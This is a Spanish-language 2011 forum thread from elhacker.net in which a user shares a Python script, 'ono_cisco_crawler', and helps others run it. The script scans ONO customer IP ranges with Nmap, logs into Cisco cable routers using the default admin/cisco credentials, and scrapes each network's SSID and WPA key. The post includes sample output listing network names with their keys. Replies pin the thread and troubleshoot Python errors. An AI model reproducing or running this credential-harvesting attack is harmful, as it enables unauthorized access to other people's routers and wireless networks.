Foro de elhacker.net

Seguridad Informática => Hacking Wireless => Mensaje iniciado por: gorilla.maguila en 16 Noviembre 2011, 23:05 pm



Título: onoXXXXXX Cisco Crawler
Publicado por: gorilla.maguila en 16 Noviembre 2011, 23:05 pm
Hola gente,

Me he registrado para compartir una herramienta que he programado en python.

El script aprovecha la configuración por defecto de los routers cisco que vienen instalados en los clientes con ssid ONOXXXXXX, donde X son números, y almacena el resultado en un archivo.

Veamos un ejemplo útil:
Mi ISP, ONO en este caso, me ha dado la IP 81.202.10.10 y veo que tengo al alcance un par de redes vecinas ONOXXXXXX, si quiero encontrar el key de las redes, siempre y cuando no se haya cambiado la configuración por defecto del router, usaría:
  
$./ono_cisco_crawler.py --range 81.202.0-20.0-255
$
$SSID=ONO666666-----KEY=saratoga-----IP:81.202.0.1
$SSID=ONO000001-----KEY=********-----IP:81.202.0.2
$SSID=ONO111112-----KEY=TDISDUVW-----IP:81.202.0.3
$SSID=ONO111113-----KEY=EUVZYDXW-----IP:81.202.0.4
$SSID=ONO111114-----KEY=alejalen-----IP:81.202.20.0

Este ejemplo buscaria en el rango 81.202.0.0/81.202.20.255 donde es posible que se encuentren las redes vecinas.El resultado se almacena en el archivo results.txt

El rango de IP's válido es cualquier rango válido para Nmap.


El Código sólo ha sido testeado en linux:

Código:
#!/usr/bin/python


# REQUIERE python3 y python nmap http://xael.org/norman/python/python-nmap/

#  Script que aprovecha la configuración por defecto de los routers cisco de las redes ONOXXXXXX,
#  donde X son números, y almacena el resultado en un archivo.
#  Veamos un ejemplo útil:
#  Mi ISP, ONO en este caso, me ha dado la IP 81.202.10.10 y veo que tengo al alcance un par de redes vecinas
#  ONOXXXXXX, si quiero encontrar el key de las redes, siempre y cuando no se haya cambiado la configuración
#  por defecto del router, usaría:
#  
#  $./ono_cisco_crawler.py --range 81.202.0-20.0-255
#  $
#  $SSID=Jesusillo-----KEY=saratoga-----IP:81.202.0.3
#  $SSID=CHUPAMELADOSVECES-----KEY=********-----IP:81.202.0.2
#  $SSID=ONO111112-----KEY=TDISDUVW-----IP:81.202.0.1
#  $SSID=ONO111113-----KEY=EUVZYDXW-----IP:81.202.11.1
#  $SSID=ONO111114-----KEY=alejalen-----IP:81.202.20.1

#  Este ejemplo buscaria en el rango 81.202.0.0/81.202.20.255 donde es posible que se encuentren
#  las redes vecinas.El resultado se almacena en el archivo results.txt
#  Más opciones:
#  $./ono_cisco_crawler.py -h

###########################################
####USALO BAJO TU RESPONSABILIDAD #########
###########################################

# Author gorilla.maguila@gmail.com

import urllib, urllib.parse, urllib.request, http.client
from urllib.error import HTTPError, URLError
import os, io
import nmap
import sys, socket
import argparse


def hello():
lineList = ["     _______________________________________",
      "    / @Scriptkiddies: USE IT AT YOUR OWN RISK!!  \ ",
               "    |                                            |",
               "    \ Author:         gorilla.maguila@gmail.com  /",              
                "     --------------------------------------- ",
" \   ^__^",
" \  (==)\,_______",
"    (__)\       )\/\ ",
" ||----w |",
" ||     ||"]
for line in lineList:
print(line)

def caveats():
lineList = ["     ___________________________________________",
      "    / Looks like you haven't found many Targets.\ ",
               "    | Try increasing timeout and decreassing    |",
               "    | parallelism!  Example:                    |",
      "    \./ono.py --range *.*.*.* --t 1550m --p 5   /",
               "     -------------------------------------------",
" \   ^__^",
" \  (**)\,_______",
"    (__)\       )\/\ ",
"     U ||----w |",
" ||     ||"]
for line in lineList:
print(line)

#Escaneo de puertos

def scan(range, timeout, parallelism, file):
  
try:
nm = nmap.PortScanner()
host_list = []
user_arguments = '-sT -P0 -p 8080 --host-timeout '+timeout+' --max-parallelism '+parallelism
print("\n\nUsing Nmap Arguments :", user_arguments)
print('Finding Possible Targets..............\n')
#Probamos con un rango de IP's de ONO
nm.scan(hosts=range, arguments=user_arguments)
#hosts_list = [(x, nm[x]['status']['state']) for x in nm.all_hosts()]
#print('\n\nFinding Possible Targets..............\n')
#while nm.still_scanning():
#print("Waiting")
#nm.wait(0)
for host in nm.all_hosts():
if(nm[host]['tcp'][8080]['state'] == 'open'):
print(host)
host_list.append(host)
if (host_list == []):
print("No Suitable hosts Found!")
#sys.exit(0)
else:
if (len(host_list) < 10):
caveats()
print('\nTargets Acquaried!')
print('Let\'s Check Targets....\n')
for x in host_list:
check_url(x,file)
except nmap.PortScannerError:
print('Nmap not found', sys.exc_info()[0])
sys.exit(0)
except:
print("Unexpected error:", sys.exc_info()[0])
sys.exit(0)



#def callback_result(host, scan_result):
#if(state == 'open'):
# if(scan_result['scan'][host]['tcp'][8080]['state'] == 'open'):
# print(host)
 

def check_url(url, file):
  
req = urllib.request.Request("http://"+url+":8080/Docsis_system.asp")
try:
urllib.request.urlopen(req, timeout=5)
except HTTPError as e:
print('HTTP Error:',e.code,"on",url)
print('Skipping!')
except URLError as e:
print('URL Error:',e.reason,"on",url)
print('Skipping!')
except socket.error as e:
print('Socket Error:', e,"on", url)
print('Skipping!')
except (http.client.BadStatusLine):
print('Looks like tcpwrapped port on',url)
print('Skipping!')
else:
try:
#Cogemos el SSID
_url = "http://" + url + ":8080/goform/Docsis_system"
values = {'username_login' : 'admin', 'password_login' : 'cisco','LanguageSelect' : 'en'
, 'Language_Submit' : '0' , 'login' : 'Log+In' }
data = urllib.parse.urlencode(values)
binary_data = data.encode('ascii')
req = urllib.request.Request(_url, binary_data)
resp = urllib.request.urlopen(req, timeout=5)
except HTTPError as e:
print('HTTP Error:',e.code,"on",url)
print('Skipping!')
except URLError as e:
print('URL Error:',e.reason,"on",url)
print('Skipping!')
except socket.error as e:
print('Socket Error:', e,"on", url)
print('Skipping!')
except (http.client.BadStatusLine):
print('Looks like tcpwrapped port on',url)
print('Skipping!')
else:
page = resp.read().decode("utf-8")
if page.find("name=\"ssid\""):
 ###Dirty Dirty please hack (Seguro que hay mejores formas)
 ###Busco dos elementos únicos, los establezco como índices de referencia
 ###para mostrar los posibles tamaños de la SSID, ya que a veces no son fijos
 ###es decir, si se ha cambiado el password a 12345 y esperamos un password de tamaño 8,
 ###mostraríamos 12345 más tres caracteres de código html, por lo que establecems puntos
 ###de referencia para evitarlo. Estoy seguro que hay métodos más elegantes
 
index = page.find("name=\"ssid\"")
count = page.find("Security Mode")
ssid = page[index+19:count-62]
try:
#Cogemos la clave

_url = "http://" + url + ":8080/goform/Quick_setup"
values =  {'Password' : '' , 'PasswordReEnter' : '' , 'setup_wifi_enable' : 'enable','ssid' : ssid, 'security_mode' : 'psk2_mixed',
'wpa_enc' : 'tkip%2Baes',  'wpa_psk_key' : '********' , 'UnhiddenPresharedKey' : '0x01', 'radius_ip_1' : '0', 'radius_ip_2' : '0',
'radius_ip_3' : '0', 'radius_ip_4' : '0', 'keysize' : '64', 'tx_key' : '1', 'h_setup_wifi_enable' : 'enable',
'h_security_mode' : 'psk2_mixed', 'h_wpa_enc' : 'tkip%2Baes', 'UserId' : ''}
data  = urllib.parse.urlencode(values)
binary_data = data.encode('ascii')
req = urllib.request.Request(_url, binary_data)
resp = urllib.request.urlopen(req, timeout=5)
except HTTPError as e:
print('HTTP Error:',e.code,"on",url)
print('Skipping!')
except URLError as e:
print('URL Error:',e.reason,"on",url)
print('Skipping!')
except socket.error as e:
print('Socket Error:', e,"on", url)
print('Skipping!')
except (http.client.BadStatusLine):
print('Looks like tcpwrapped port on',url)
print('Skipping!')
else:
page = resp.read().decode("utf-8")
if page.find("name=\"wpa_psk_key\""):
index = page.find("name=\"wpa_psk_key\"")
count = page.find("<!--radius")
key = page[index+51:count-371]
result = "SSID="+ssid+"-----KEY="+key+"-----IP:"+url
#print("SSID=",ssid,"KEY=",key,"IP:",url)
#Write to file
print(result)
file_io(file,result)

def file_io(file, line):
try:
fout = open(args.file, "a")
fout.write("".join(line)+"\n")
fout.close()
except IOError as errno:
print(errno)


#
#Start
#
if __name__ == '__main__':

parser = argparse.ArgumentParser()
parser.add_argument('--range', dest = 'range', action = 'store',
help = 'Single/Range Ip Address to scan')
parser.add_argument('--t', dest = 'timeout', action = 'store',
default = '200m', help = 'Host timeout during scanning')
parser.add_argument('--p', dest = 'parallelism', action = 'store',
default = '20', help = 'Max parallell host scanned')
parser.add_argument('--w', dest = 'file', action = 'store',
default = 'results.txt', help = 'File output name')
args = parser.parse_args()
if(args.range == None):
print("Usage ./ono_cisco_crawler.py -h for more information")
else:
hello()
scan(args.range, args.timeout, args.parallelism, args.file)


Usadlo con responsabilidad. Espero vuestras sugerencias


Título: Re: onoXXXXXX Cisco Crawler
Publicado por: ChimoC en 17 Noviembre 2011, 12:21 pm
Buenas:

Muchas gracias  ;-)

Le metemos una chincheta  :P

Un saludo

ChimoC


Título: Re: onoXXXXXX Cisco Crawler
Publicado por: kjkj2011 en 2 Diciembre 2011, 02:30 am
lo he probado en backtrack 5 y no me functiona..por favor ayuda...


Título: Re: onoXXXXXX Cisco Crawler
Publicado por: gorilla.maguila en 3 Diciembre 2011, 23:13 pm
lo he probado en backtrack 5 y no me functiona..por favor ayuda...

Qué problema tienes?


Título: Re: onoXXXXXX Cisco Crawler
Publicado por: kjkj2011 en 5 Diciembre 2011, 02:24 am
Qué problema tienes?
Gracias..por responderme...le doy ejecutar en un terminal...se me abre ...y se me cierra en seguida el terminal...por favor si puedes explicar como se usa ...seguro que algo hago mal...


Título: Re: onoXXXXXX Cisco Crawler
Publicado por: gorilla.maguila en 6 Diciembre 2011, 01:48 am
Sólo tienes que ejecutar en la consola

Código:
./ono_cisco_crawler -h


Y verás las opciones de uso. Aunque hace unos días que ONO ha capado el puerto 8080 por lo que la herramienta es totalmente inútil. Veremos a ver si ONO continua con el capado general del puerto (todo parece indicar que sí)

Te dejo aquí unas muestras de cuando funcionaba:

http://www.megaupload.com/?d=VMYK10L1 (http://www.megaupload.com/?d=VMYK10L1)

Mira también en  http://foro.seguridadwireless.net/index.php?topic=41472.0 (http://foro.seguridadwireless.net/index.php?topic=41472.0), ahí solucioné algunas dudas de uso


Título: Re: onoXXXXXX Cisco Crawler
Publicado por: beholdthe en 14 Diciembre 2011, 20:30 pm
Pero si esto ya no funciona, porque sigue teniendo chincheta?????????


Título: Re: onoXXXXXX Cisco Crawler
Publicado por: dreKion en 22 Diciembre 2011, 13:06 pm
a mi me sigue encontrando algunas :)


Título: Re: onoXXXXXX Cisco Crawler
Publicado por: kjkj2011 en 30 Diciembre 2011, 23:45 pm
se que ya no se puede que el port 8080 esta cerrado..pero por favor que alquien me ayuda...no consigo ejecutar el script in backtrack 5 por favor un video de como hacerlo...y que tengo que tener instalado para ejecutar el script...por favor...me sale eso ile "ono_cisco_crawler.py", line 6
SyntaxError: Non-ASCII character '\xc3' in file ono_cisco_crawler.py on line 6, but no encoding declared; see http://www.python.org/peps/pep-0263.html for details------
por favor ayuda


Título: Re: onoXXXXXX Cisco Crawler
Publicado por: gorilla.maguila en 31 Diciembre 2011, 03:26 am
Prueba a añadir después de la linea

#!/usr/bin/python

esta linea:

# coding: utf-8

tal que quede asi:

#!/usr/bin/python
# coding: utf-8


Título: Re: onoXXXXXX Cisco Crawler
Publicado por: kjkj2011 en 31 Diciembre 2011, 15:56 pm
Traceback (most recent call last):
  File "ono_cisco_crawler.py", line 33, in <module>
    import urllib, urllib.parse, urllib.request, http.client
ImportError: No module named parse

por favor ahora me sale ese error...plzzz :huh: